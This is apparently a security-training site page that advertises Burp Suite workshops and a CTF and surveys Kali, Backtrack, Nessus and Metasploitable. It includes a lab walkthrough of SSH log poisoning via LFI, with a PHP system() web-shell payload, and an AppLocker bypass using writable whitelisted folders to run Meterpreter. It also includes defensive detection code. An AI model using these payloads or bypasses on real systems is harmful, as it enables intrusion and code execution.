Advanced Burp Suite


Burp Suite is one of the most popular web application security testing tools. It has a ton of features and can do everything from intercepting and modifying HTTP requests/responses in real time, to scanning web applications for vulnerabilities, to brute forcing login forms, to testing the entropy of session tokens, and it even allows you to increase its functionality by writing plugins for it.

As awesome as the tool is – surprisingly few people are really comfortable with it. I decided to put together a 2-day workshop on the advanced features of the tool.

This workshop picks up where the original Burp Suite course left off. It assumes the student is strongly familiar with web application security fundamentals, the OWASP Top 10, and basic application testing with Burp Suite.

This workshop will cover:
– Integrating Burp and SoapUI for webservices testing
– Integrating SQLMap, and w3af
– Developing your own plugins (Note: you’ll need Eclipse for this)



To answer a few questions I’ve received:

  • Yes it will be recorded for those of you that can’t attend
  • True, it will be a live/interactive workshop so you can ask me questions during the event.
  • Yes, you get the virtual machines as soon as you sign up for the event


Class Date and Time

  • Mon, Dec 4, 2017 7:00 PM – 9:00 PM EST

  • Wed, Dec 6, 2017 7:00 PM – 9:00 PM EST



Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.


What is Burp Suite?

When it comes to securing web applications, Burp Suite stands out. PortSwigger Security is the company that produces Burp Suite, which is developed in the Java programming language. There are two versions of this security tool:

  1. A free version, available for download online, named the Free Edition.
  2. A paid version, referred to as the Professional Edition, usually purchased after a free trial period.

The purpose of Burp Suite is to be a complete solution for the whole process of checking a web application and fixing what is found. One of the most interesting facts about Burp Suite is that a mobile application was developed with the same tools as the desktop version, to be used on recent iOS versions.

What tools does Burp Suite offer?

Let's now have a look at the tools Burp Suite provides its users with. There are several, and together they support penetration testing to establish the security of a web application.

  1. HTTP proxy: Burp Suite offers a web proxy server that sits as a man-in-the-middle between the client's browser and the web server at the other end of the connection. Any raw traffic running between the two ends can then be inspected and modified.
  2. Scanner: Burp Suite also offers a scanner for web application vulnerabilities. It can automate these scans, which is a very important part of web application penetration testing and security.
  3. Intruder: the importance of this tool lies in its ability to launch attacks on a vulnerable web application. Intruder supports several kinds of attack, including SQL injection, cross-site scripting, parameter manipulation and brute force against vulnerable logins. It searches for such attackable weaknesses and, whenever one is detected, the attack is ready to launch. The user configures an algorithm that Intruder then uses to generate HTTP requests.
  4. Spider: when manual mapping is the approach, this tool makes it easy and fast to map the content and functionality of an application. It can crawl a web application.
  5. Repeater: a user can test an application with this tool. The tester sends a modified request to the server, then another, and the responses are observed to understand the application's behaviour.
  6. Decoder: this tool is very useful when it comes to encoded data. It recognizes and detects different encoding formats, using several techniques, so encoded data can be converted back to its canonical form. It also works the other way round, transforming raw data into encoded or hashed forms.
  7. Comparer: this tool compares two pieces of data and detects any differences between them.
  8. Extender: this tool allows Burp Suite to be extended by third-party code or by security testers. This way, Burp Suite extensions can be loaded to add security functionality.
  9. Sequencer: this tool helps analyze and measure the quality of randomness in a sample of data items. In this way, session tokens or other data that should be unpredictable can be shown to be predictable.

Examples of such vital tokens are anti-CSRF tokens, password reset tokens and others; they are meant never to be guessed or discovered.

Let's now get started with Burp Suite

  • How to launch Burp Suite?

  1. It is important to note that the software is written in the Java programming language. It is distributed as a .jar file, which is a standalone Java archive.
  2. Browse to the vendor's website and download the Free Edition from there.
  3. If you are a professional user, log in with your credentials and download the Professional Edition instead.
  4. The jar file needs a Java environment to run, which removes the need to unpack any of its contents.
  5. Make sure that Java is installed before beginning to use Burp Suite.
  6. Open the command prompt; the method depends on your operating system:

  • If you are a Windows user, press the Start button, type "cmd" into the search box, then click the program to open it.
  • If you are a Mac OS X user, open "Applications" from the system dock, click "Utilities" and choose "Terminal".
  • If you are a Linux user, choose "Console" or "Shell" from the list of applications.

  7. Inside the command prompt you just opened, type the following command: java -version
  8. If Java is already installed on the machine, a message like the following appears: java version "1.6.0_21". Note that the required version of Java is at least 1.6.
  9. Now the Burp .jar file can be clicked to open Burp directly. However, launching Burp from the command line gives you much more control and several options on execution, for example specifying how much memory should be dedicated to running Burp Suite on the machine.
  10. Let's try the following command for instance:
    java -jar -Xmx1024m /path/to/burp.jar

This command allocates 1024 MB to Burp, with the Burp file located at /path/to/burp.jar.

  11. A splash screen should now be displayed, indicating that it works.

Let's select a project

There are three options to choose between when opening or creating a project:

  1. Temporary project: if there is no need to save the data for later use, this option works best. All data is kept in volatile memory.
  2. New project on disk: this option requires a Burp project file. A new project is created and a name must be given to it.
  3. Open existing project: this simply opens an existing project. However, the Spider and Scanner tools are paused by default at that moment.


Burp Suite Workshop

As awesome as the tool is – surprisingly few people are really comfortable with it. I decided to put together a workshop on Burp Suite.


The first day of the workshop I will be covering the core features of the tool (Proxy, Spider, Intruder, Repeater, Sequencer, Decoder, and Comparer), and common ways to use the tool.

The second day of the workshop I’ll be covering the more advanced features – integrating Burp with other tools, and writing your own plugins.


Web App Security Testing & Burp Suite Fundamentals

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with SQLMap

Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation




Class Date and Time

Next Date to be announced soon.





The cost for this workshop is $200 online.




Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.


How to perform SSH log poisoning through LFI to exploit a web server?

This section walks through a well-known way to exploit a web server that suffers from local file inclusion (LFI). Assume the target is a Metasploitable 2 machine and the attacking system is Kali Linux.

The following steps explain how the process is performed from Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect to the target over SSH. The following command does this:
    ssh [email protected]
  3. Check the permissions of the auth.log file first, using the following command:
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file has read-write permission for its owner and is readable by other users. The listing should look like the following:
    -rw-r--r-- syslog adm ...
  5. We can now read the whole log with the following command:
    tail -f /var/log/auth.log
  6. Walk through the log and check the entries for the user named "msfadmin".
  7. Now attempt to connect to the server with a counterfeit username. The following command makes an invalid login attempt:
    ssh [email protected]
  8. Permission should be denied, with the following message shown clearly:
    "Permission denied, please try again."
  9. Go back to auth.log and check whether the fake login attempt has been recorded. It should show that the invalid user tried to get access. An entry like the following should appear, with the attacker's IP address after "from":
    "Failed Password for invalid user hacker from port 56566 ssh2"
  10. This shows that every login attempt, successful or not, is recorded in the log. Let's now try passing PHP code as the invalid username and see how the server reacts. The following command makes such a login attempt:
    ssh '<?php system($_GET['c']); ?>'@
  11. Go back to auth.log again and confirm that this attempt has also been recorded. An entry like the following should appear, with the attacker's IP address after "from":
    "Failed Password for invalid user <?php system($_GET['c']); ?> from port 49642 ssh2"
  12. Assume you have previously created an LFI-vulnerable page; browse to it using the following link:
  13. An error will appear that looks like a local file inclusion vulnerability.
  14. Now include the auth.log file as the parameter, using the following URL in the browser:
  15. A warning will be displayed with the following text:
    Warning cannot execute a blank command
  16. Let's discuss what this actually means. The PHP code containing the system() call has already been injected into the log, so any command can now be sent as the parameter.
  17. Now browse to

    This will dump the contents of auth.log and also execute the command passed in the query parameter.

  18. Now browse to
     " file=/var/log/auth.log&c=pwd".

    The results of the command are then displayed in the browser window.
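As an added example (not from the original post), here is the defender's side of the walkthrough above: a small Python script that flags auth.log entries whose "invalid user" field carries PHP, and a path-confinement check of the kind the vulnerable page's file parameter should have had. The log lines, the 192.0.2.x addresses and the /var/www/pages directory are constructed assumptions.

```python
"""Defender-side companion to the SSH log-poisoning walkthrough.

Two things the walkthrough implies but never shows:
  1. sshd copies the attacker-chosen username verbatim into auth.log, so a
     log monitor can flag usernames that contain PHP before anyone includes
     the file through an LFI.
  2. The LFI itself exists because the page hands ?file=... to include();
     confining the resolved path to one directory closes that hole no matter
     what auth.log contains.
All log lines, IP addresses and paths below are constructed samples.
"""
import posixpath
import re

# sshd's failure message: the username sits between "invalid user " and " from ".
# IGNORECASE covers both "Failed password" (real sshd) and the capitalised
# form quoted in the walkthrough.
FAILED_LOGIN_RE = re.compile(
    r"Failed password for invalid user (?P<user>.+?) from (?P<ip>\S+) port (?P<port>\d+) ssh2",
    re.IGNORECASE,
)

# Fragments that never belong in a username but would be interpreted by PHP's
# include() once the log file is pulled in (compared case-insensitively).
POISON_MARKERS = ("<?php", "<?=", "<?", "?>", "system(", "exec(", "passthru(",
                  "shell_exec(", "$_get", "$_post", "$_request")

# Constructed auth.log excerpt mirroring steps 7-11 of the walkthrough.
SAMPLE_AUTH_LOG = """\
Dec  4 19:02:11 metasploitable sshd[4321]: Accepted password for msfadmin from 192.0.2.10 port 56501 ssh2
Dec  4 19:03:05 metasploitable sshd[4330]: Failed password for invalid user hacker from 192.0.2.10 port 56566 ssh2
Dec  4 19:04:40 metasploitable sshd[4338]: Failed password for invalid user <?php system($_GET['c']); ?> from 192.0.2.10 port 49642 ssh2
Dec  4 19:05:12 metasploitable sshd[4345]: Failed password for invalid user admin from 192.0.2.11 port 50111 ssh2
"""


def parse_failed_login(line):
    """Return (user, ip, port) for a failed-login line, or None for anything else."""
    m = FAILED_LOGIN_RE.search(line)
    if m is None:
        return None
    return m.group("user"), m.group("ip"), int(m.group("port"))


def is_poisoned_username(user):
    """True when the username carries content a PHP include() would execute."""
    lowered = user.lower()
    return any(marker in lowered for marker in POISON_MARKERS)


def find_poisoning_attempts(log_text):
    """Scan auth.log text; return [(line_no, user, ip)] for poisoned usernames."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parsed = parse_failed_login(line)
        if parsed is not None and is_poisoned_username(parsed[0]):
            hits.append((line_no, parsed[0], parsed[1]))
    return hits


# ---- application-side fix for the include() that made the attack possible ----
PAGES_DIR = "/var/www/pages"   # assumed directory holding the includable pages


def resolve_include(file_param, base_dir=PAGES_DIR):
    """Confine a user-supplied 'file' parameter to base_dir.

    Returns the normalised path if it stays inside base_dir, otherwise None,
    so "/var/log/auth.log" and "../../log/auth.log" are both refused.
    """
    if not file_param:
        return None
    base = posixpath.normpath(base_dir)
    # join() discards base when file_param is absolute; normpath collapses "..".
    target = posixpath.normpath(posixpath.join(base, file_param))
    if target == base or posixpath.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for line_no, user, ip in find_poisoning_attempts(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: poisoned username from {ip}: {user!r}")
    for param in ("about", "/var/log/auth.log", "../../log/auth.log"):
        print(f"file={param!r} -> {resolve_include(param)}")
```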

What is Kali Linux?

One of the most important security tools to understand and work with well is, in fact, Kali Linux. Let's discuss its benefits in a nutshell.

⦁ Penetration testers and digital forensics practitioners consider it an essential tool for their purposes.
⦁ It provides its users with a variety of tools and functions which fall into thirteen categories:
  ⦁ Information Gathering, such as DMitry
  ⦁ Vulnerability Analysis, like Inguma
  ⦁ Exploitation tools, such as the Metasploit Framework
  ⦁ Wireless Attacks, like WIFI Honey
  ⦁ Forensics, such as Binwalk
  ⦁ Web Applications, like Skipfish
  ⦁ Stress Testing, like FunkLoad
  ⦁ Sniffing and Spoofing, such as Wireshark
  ⦁ Password Attacks, like those done by TrueCrack
  ⦁ Maintaining Access, such as Intersect
  ⦁ Hardware Hacking, performed by dex2jar for instance
  ⦁ Reverse Engineering, which can for instance use Apktool
  ⦁ Reporting Tools, such as MagicTree

What is Metasploitable?

Basically, Metasploitable is an intentionally vulnerable machine meant for purposes such as training, testing an exploit, or general target practice. The unique aspect of Metasploit is that it can check for vulnerabilities at the operating system and network service layers, not merely the application layer.

Metasploitable 2 is like a good bag containing a bunch of security tools such as Metasploit. A production environment usually has Metasploitable 2 to help with examining and practicing the exploitation of vulnerabilities.

Metasploitable 3 is an even newer version of Metasploitable. It is a virtual machine built from the ground up with a lot of security vulnerabilities. With this version, Metasploit is the security tool used to test exploits. Metasploitable 3 was originally released under a BSD-style license.

The following are the requirements to run Metasploitable:

  1. An operating system capable of running all of the required applications listed below.
  2. A processor with VT-x/AMD-V support (recommended)
  3. 65 GB of available drive space
  4. 4.5 GB of RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let's talk in the last few lines about Metasploit itself.

The Metasploit Project is a computer security project that shows vulnerabilities and aids penetration testing. Penetration testing refers to an authorized simulated attack on a computer system. It looks for security weaknesses and for Intrusion Detection System (IDS) signatures; an IDS, on the other hand, monitors a network or systems for malicious activity. The best-known sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework later in this article.

Finally, one could use Metasploit to perform both legitimate and unauthorized access and activities on computer systems. In this regard, it is no different from similar commercial products such as Immunity's Canvas or those of Core Security Technologies. Metasploit, however, is commonly used to break into remote systems or to test a computer system for vulnerabilities.


Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:


Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players


This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.



CTF Prep Class September 9th from 10 am – 4 pm EST
CTF Prep Class September 16th from 10 am – 4 pm EST

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.


CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants acquire automatic registration for the CTF Competition

Signup now and let’s have some fun

Capture The Flag (CTF) Competition




Game Basics:

This will be a fun game. Each team's members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a GPG-encrypted file that will serve as the team's flag. That flag file must be copied to the appropriate directory on the victim server for that server to count as compromised and for points to be awarded to the team.


Game Rules:

– One can use Nessus and Metasploit, but beware of bandwidth penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– Scoring server will verify that target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable


Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate


Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts class per team participant

Signup now and let’s have some fun

Capture The Flag (CTF) Prep Class




Background to Backtrack

You must have come across the word Backtrack when it comes to hacking on the Linux operating system. If you have never heard of it and have not worked on its present-day successor, then trust me, you are missing a lot. But why do you think I am taking this so seriously?

The answer lies in two fancy and interesting notions: digital forensics and penetration testing. In case you do not know much about these two, I will explain them in a nutshell right here. Digital forensics is the branch of forensic science that specializes in the recovery and investigation of material found in digital devices such as computers and mobile devices. Penetration testing, on the other hand, is a simulation of an actual attack on a system to scan for its vulnerabilities, exploit them, and thereby gain access to the data and features of that system.

Now I can tell you why you might not have heard of it: you didn't start hacking until 2013, when Kali Linux was released as a rebuilt version of Backtrack. The Offensive Security team was responsible for that turning point. Kali was rebuilt around the Debian distribution, while Backtrack was originally based on Knoppix. Both Knoppix and Debian are Unix-like operating system distributions, yet each has its own unique features.

One good thing about it is the wide variety of users its development team aimed to serve. Unlike several other security tools, it makes it very simple for beginner penetration testers to get closer to the field and gain experience. Moreover, its community was made up of individuals from diverse backgrounds: skilled penetration testers, government entities, those motivated to learn and contribute to information technology in general and computer security in particular, and those still new to the field were all covered under the umbrella of Backtrack and its community.


A good way to analyze a hacking platform is first to look briefly at its history, hoping to understand the background of its founders and their purposes behind the tool. The story begins when WHAX and the Auditor Security Collection merged after years of fierce competition between them. Both targeted penetration testing, and merging them resulted in a very effective tool in the same field, named Backtrack.

WHAX was based on the Slax distribution of Linux, for which Mati Aharoni was well known at the time (he is now famous for creating Backtrack and Kali Linux as well, of course). Whoppix, the predecessor of WHAX, was based on Knoppix, which was mentioned earlier in the article.

Alright, now we know what WHAX was; what was the Auditor Security Collection then? Its organizer, Max Moser, designed it to include more than three hundred tools in a user-friendly manner to assist in penetration testing. It was, in fact, a live CD based on Knoppix.

Backtrack went through eleven main releases until its last one. Every release has since lost support from the Backtrack development team; no version is supported any more, since Kali Linux replaced it.

  1. Backtrack v1.0 Beta was released in February 2006.
  2. Backtrack v1.0 was released in March of the same year.
  3. Backtrack v2.0 was released in 2007.
  4. Backtrack v3.0 was released in 2008.
  5. The final release of Backtrack v4.0 came in January 2010.
  6. Backtrack 4 R1 was released in May 2010.
  7. Backtrack 4 R2 was released in November 2010.
  8. Backtrack 5 was released in May 2011.
  9. Backtrack 5 R1 was released in August 2011.
  10. Backtrack 5 R2 was released in March 2012.
  11. The final version, Backtrack 5 R3, was released in August 2012.

What tools does Backtrack offer?

To see how effective and comprehensive Backtrack really is, we have to remind ourselves of the security tools it combines and supports. Before going through those tools, remember one very important feature that gives it an advantage over its competitors, if it has any.

Backtrack can be installed on, and run live from, portable media such as CDs and USB flash drives. It also supports installation on hard disks. Simply put, one installs it and boots it from a live DVD or thumb drive.

Now it is time to look at a list of widely used security tools that Backtrack supports.

  • Metasploit, a computer security project that shows vulnerabilities and aids penetration testing (see the article titled "What is Metasploit").
  • Armitage, Metasploit's graphical front end, which shows vulnerabilities clearly and recommends actions and exploits as well.
  • Ophcrack, the Windows login password cracker.
  • Hydra, another password cracking tool.
  • Kismet, a well-known network detector and packet sniffer.
  • Wireshark, the de facto network packet sniffer and analyzer.
  • Cisco OCS Mass Scanner, a fast scanner that tests Cisco routers for default telnet and enable passwords.
  • Aircrack-ng, the magical Wi-Fi network sniffer and cracker.
  • Gerix, another Wi-Fi cracker.
  • All the Wi-Fi drivers that support monitor mode and packet injection, which is what interfering with an already established network requires.
  • The incredible Nmap network scanner, which finds hosts and services and builds a map of the entire network.
  • Browser Exploitation Framework (BeEF).
  • Several exploits are included, as is commonplace software like web browsers.

To be honest, it is almost impossible to mention every single included tool here; doing so would get silly, with no real benefit. Nonetheless, another way to present the other tools is to describe the categories into which they were divided in Backtrack. In fact there were twelve categories, which became thirteen in the latest "Kali" version. Here I will list the thirteen of Kali; I will list the twelve later in this article for comparison.

  1. Information Gathering, such as DMitry
  2. Vulnerability Analysis, like Inguma
  3. Exploitation tools, such as the Metasploit Framework
  4. Wireless Attacks, like WIFI Honey
  5. Forensics, such as Binwalk
  6. Web Applications, like Skipfish
  7. Stress Testing, like FunkLoad
  8. Sniffing and Spoofing, such as Wireshark
  9. Password Attacks, like those done by TrueCrack
  10. Maintaining Access, such as Intersect
  11. Hardware Hacking, performed by dex2jar for instance
  12. Reverse Engineering, for which we can use Apktool, for instance
  13. Reporting Tools, such as MagicTree

Getting Started with Backtrack

In this section, I will walk through its main features with screenshots for illustration. Although all of these screenshots are of the latest version, Backtrack 5 R3, I prefer that, if you have the chance, you use Kali Linux instead, because Backtrack is no longer supported.

  • The Backtrack Menu
  • Leave Menu
  • Utilities Menu
  • The System Menu: it displays applications essential for a hacker
  • The Internet Menu
  • BackTrack: here I am listing the twelve categories as per the latest release of Backtrack


  1. Information Gathering
  2. Vulnerability Management
  3. Exploitation tools
  4. Privilege Escalation
  5. Maintaining Access
  6. Reverse Engineering
  7. RFID Tools
  8. Stress Testing
  9. Forensics
  10. Reporting Tools
  11. Services
  12. Miscellaneous
  • Exploitation Tools




What is Nessus?

Nessus is renowned software from Tenable Network Security. It specializes in monitoring and scanning for security vulnerabilities. The initial release of this software was free to use for non-enterprise clients. According to, it ranked as the first vulnerability scanner and the most common among its counterparts in 2000, 2003 and 2006.



There are four main types of Nessus software. Nessus Cloud is a Software as a Service (SaaS) platform. Nessus Manager is a physical or virtual vulnerability manager. Nessus Professional is a version that runs on a device such as a laptop or personal computer (PC). Finally, the free type is Nessus Home, for home users.

Historical Overview


In 1998, Renaud Deraison set out to create a free remote security scanner and publish it online, making it available to everyone around the world. Back then, it was an open source project. This lasted until 2005, when it became closed source, owned by Tenable Network Security, co-founded by Deraison.

In 2005, Tenable Network Security stated that more than seventy-five thousand organizations around the world used it. At that time the current version was Nessus 3, and to this day its engine is free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux and some other operating systems.

Before Nessus 3 there was Nessus 2, which required an agent to operate on several operating systems. There is no need to say how slow it was to use back then. Nessus 2 was released under the General Public License (GPL), paving the way for similar projects like OpenVAS and Porz-Wahn, which are both open source. Despite this, Tenable Network Security released many updates for this version of Nessus even after Nessus 3 came into existence.

In 2008, the situation improved somewhat from the perspective of both the company and its users, when a free version for home users became available, with plugin feeds. Meanwhile, enterprises had, and still have, to pay to use the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4. It would later release Nessus 5 in 2012 and later the newest version, Nessus 6, in 2014.

What does Nessus do?


Let's now discover what features it has, and to what extent such software can be beneficial for security purposes. First, let me begin with some services that Nessus 3 and its descendants provide their owners with.

  • It automatically scans for vulnerabilities and analyzes them in order to prioritize recommended remediation.
  • Plugins are fed to customers' installations every day to update them with newly disclosed vulnerabilities, so those can be detected as well.
  • It supports Supervisory Control and Data Acquisition (SCADA) audits.
  • It supports audits of embedded devices.
  • It offers mobile device scanning.
  • Web applications and cloud environments can also be scanned by it.
  • It can search for sensitive data such as social security numbers, credit card details, and much other confidential information.
  • Nessus 3 offers a means of technical support for an organization.
  • It can audit anti-virus configurations.
  • It can audit against Federal Desktop Core Configuration (FDCC) standards.
  • Nessus 3 supports audits against the Payment Card Industry Data Security Standard (PCI-DSS) as well.

Now, why don’t we break down the types of vulnerabilities detectable when scanning through it?

  1. Vulnerabilities related to passwords, such as
    • System accounts having no passwords
    • System accounts having default passwords, or passwords provided on initial setup or after a reset
  2. Vulnerabilities whose remote exploitation could grant access to sensitive data
  3. Misconfiguration vulnerabilities such as missing software patches or an open mail relay
  4. Denial-of-service vulnerabilities in the TCP/IP stack, found by sending mangled packets over the network
  5. Preparations for conducting PCI DSS audits

Is Nessus actually necessary?

The answer to this question follows from a summary of its unique capabilities, which are also the reasons for choosing it.

  • Endpoint agents can be configured on a device:
    • They allow offline scans and report the results to Nessus Cloud and Nessus Manager administrators whenever an internet connection is established.
    • They also have the ability to scan devices for malware.
  • Upon buying Nessus Professional for an organization, or hosting on Nessus Cloud or Nessus Manager, technical support for any related issue is always available.
  • On-demand, and completely free, training is offered either physically in Tenable Network Security’s own centers, virtually, or on-site where the customer is based.
  • The Nessus console has an enhanced, user-friendly Graphical User Interface (GUI).
    • Security policies can be applied with a few clicks and checkboxes.
    • Administrators can set up email notifications for scan results and the recommended remediation to apply.
    • Preconfigured or customized reports can be run by administrators.
  • It exposes a Representational State Transfer Application Program Interface (RESTful API) for easy integration into any organization.
  • Both Nessus Cloud and Nessus Manager integrate with CyberArk for credential management, and with various patch management systems. Some of the vendors of those systems:
    • For computer systems: Microsoft, Dell, IBM, and Red Hat.
    • For mobile systems: Apple, Microsoft, AirWatch, and MobileIron.

Given all of these premises, and depending on business practices, my answer to the initial question is definitely yes. All of the aforementioned characteristics distinguish it from its software counterparts. Other scanners may have one of these characteristics, yet so far it is almost impossible to find one that combines all of them.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scanning results, combined with penetration testing tools, can indicate the security risk of a computer system. Testing tools that could be used in this regard are Immunity CANVAS, Core IMPACT, and of course Metasploit. In addition, in the case of a password-related vulnerability, it can use the password cracking tool Hydra to recover the password and gain access afterward.

One could, for instance, make full use of Nessus Home to help with penetration testing. Nessus Home is a free version, as mentioned before.


  1. Download and install it.
  2. Set up a Nessus account and activate the installed copy with the activation code.
  3. Start a vulnerability scan.
  4. Understand the results: if we chose Basic Network Scan, go through each device’s Internet Protocol (IP) address and understand where the vulnerabilities actually originate.
  5. Discover how to exploit such devices. Though Nessus does not specialize in this, it will show you where to go.
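Step 4 above is done by eye in the Nessus UI. As an added example (not from the original post or from Tenable), the Python below parses a .nessus XML export (NessusClientData_v2 format) and ranks hosts and findings by severity, which is the starting point for deciding where the vulnerabilities originate and what to remediate first. The sample report is constructed inline with placeholder plugin IDs.

```python
"""Prioritize findings from a Nessus .nessus export (NessusClientData_v2 XML).

Added example for this article, not Tenable's code. The report below is
constructed by hand with placeholder plugin IDs; a real file comes from the
scan's Export -> Nessus action in the web UI.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Nessus severity attribute: 0 Info, 1 Low, 2 Medium, 3 High, 4 Critical
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export: two hosts, placeholder plugin IDs and names.
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="Basic Network Scan">
    <ReportHost name="10.0.0.5">
      <HostProperties><tag name="host-ip">10.0.0.5</tag></HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="900001" pluginName="SMB remote code execution (placeholder)"
                  pluginFamily="Windows">
        <risk_factor>Critical</risk_factor>
        <solution>Apply the vendor patch.</solution>
      </ReportItem>
      <ReportItem port="23" svc_name="telnet" protocol="tcp" severity="2"
                  pluginID="900002" pluginName="Telnet cleartext authentication (placeholder)"
                  pluginFamily="Misc.">
        <risk_factor>Medium</risk_factor>
        <solution>Disable Telnet and use SSH.</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900003" pluginName="OS identification (placeholder)"
                  pluginFamily="General">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
    <ReportHost name="10.0.0.9">
      <HostProperties><tag name="host-ip">10.0.0.9</tag></HostProperties>
      <ReportItem port="25" svc_name="smtp" protocol="tcp" severity="3"
                  pluginID="900004" pluginName="Open mail relay (placeholder)"
                  pluginFamily="SMTP problems">
        <risk_factor>High</risk_factor>
        <solution>Restrict relaying to authenticated or internal senders.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

def parse_nessus(xml_text):
    """Return {host_ip: [finding dicts]}; informational (severity 0) items are dropped."""
    root = ET.fromstring(xml_text)
    findings = defaultdict(list)
    for host in root.iter("ReportHost"):
        # Prefer the host-ip property; fall back to the ReportHost name attribute.
        ip = host.findtext("HostProperties/tag[@name='host-ip']") or host.get("name")
        for item in host.findall("ReportItem"):
            severity = int(item.get("severity", "0"))
            if severity == 0:
                continue  # informational plugins are not remediation work
            findings[ip].append({
                "severity": severity,
                "severity_name": SEVERITY_NAMES.get(severity, "Unknown"),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName"),
                "port": f"{item.get('port')}/{item.get('protocol')}",
                "solution": (item.findtext("solution") or "").strip(),
            })
    return dict(findings)

def prioritize(findings):
    """Order hosts by worst finding, then by count; findings within a host worst-first."""
    ranked = [(ip, sorted(items, key=lambda f: f["severity"], reverse=True))
              for ip, items in findings.items()]
    ranked.sort(key=lambda pair: (pair[1][0]["severity"], len(pair[1])), reverse=True)
    return ranked

if __name__ == "__main__":
    for ip, items in prioritize(parse_nessus(SAMPLE_NESSUS)):
        print(ip)
        for f in items:
            print(f"  [{f['severity_name']}] {f['plugin_name']} on {f['port']}: {f['solution']}")
```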


How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, we need an insight into what AppLocker is and how it works before going through the technical details.

AppLocker is basically software from Microsoft that grants some users specific privileges while denying the same privileges to other users. In other words, some users are free to open particular applications on the operating system whereas others do not have the right to open them. For instance, one user could freely run Internet Explorer while another cannot even open it. Most sensitive machines, such as Automated Teller Machines (ATMs) and computers inside important organizations, use AppLocker.

AppLocker essentially covers five main categories of files:

  • Executable files, with .exe and .com extensions, such as ipconfig.exe
  • Installer files, which Windows uses to install new software on the computer or machine; such files have .msi, .msp, and .mst extensions
  • Script files, with .ps1, .vbs, .vba, .cmd, and .js extensions
  • Packaged apps, which are installed through the Microsoft Store
  • DLL files, with .dll and .ocx extensions

Throughout this article, the main focus is on the file formats most commonly involved when discussing security restrictions and privileges under AppLocker. Therefore, I will mostly deal with executable files, installers, and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tools -> Services
  2. Open the Group Policy Editor, which is gpmc.msc on a domain controller and gpedit.msc on a local machine
  3. If the previous steps did not work, type “Edit group policy” into the search box in the menu bar.
  4. Under “Security Settings” open “Application Control Policies”
  5. Press “Configure Rule Enforcement” to choose among the five aforementioned application categories, and apply appropriate filtering accordingly.
  6. Three main points now determine the rules governing the usage of each of those categories:

a. Execution Path:

By default, all executable files and scripts that reside in the two directories “C:\Windows” and “C:\Program Files” are allowed. If that were not the case for files in these locations, the system would not boot in the first place.

b. Information about the Publisher:

Sometimes AppLocker relies on the vendor’s signature on a specific executable (binary) file, which is checked against the vendor’s public key. Based on this, AppLocker may decide to allow or deny such a file.

c. File Hash:

AppLocker stores Message Digest 5 (MD5) hashes of executable files and uses them to decide whether to allow a certain file. Although this approach requires a great deal of memory, it is essential for AppLocker in order to prevent hazardous executable files from running.

Consider a Standard Setup

When the user does not change any of the default rules, all executable files other than those located in “C:\Windows” and “C:\Program Files” cannot be run anywhere on the machine. This is a problem because, for instance, we cannot run Meterpreter.exe.

There is, in fact, a way out of this problem. Think about it this way: executable files are not allowed to run from several locations on the machine, while other locations do not prevent the same executables from running. If you could learn those latter locations, then as a standard user with no admin privileges you could run any desired executable on the machine; it seems straightforward, right? Well, going through each location and manually investigating the rules applied to it is tedious work. What is the solution then?

Basically, a PowerShell script is an appropriate way to automatically identify where we can write, and therefore run our executable file. A basic installation leaves “C:\Windows\Tasks” and “C:\Windows\tracing” writable by everyone.

  • To have PowerShell show us these locations, the “Get-Content” and “Invoke-Expression” commands are used.

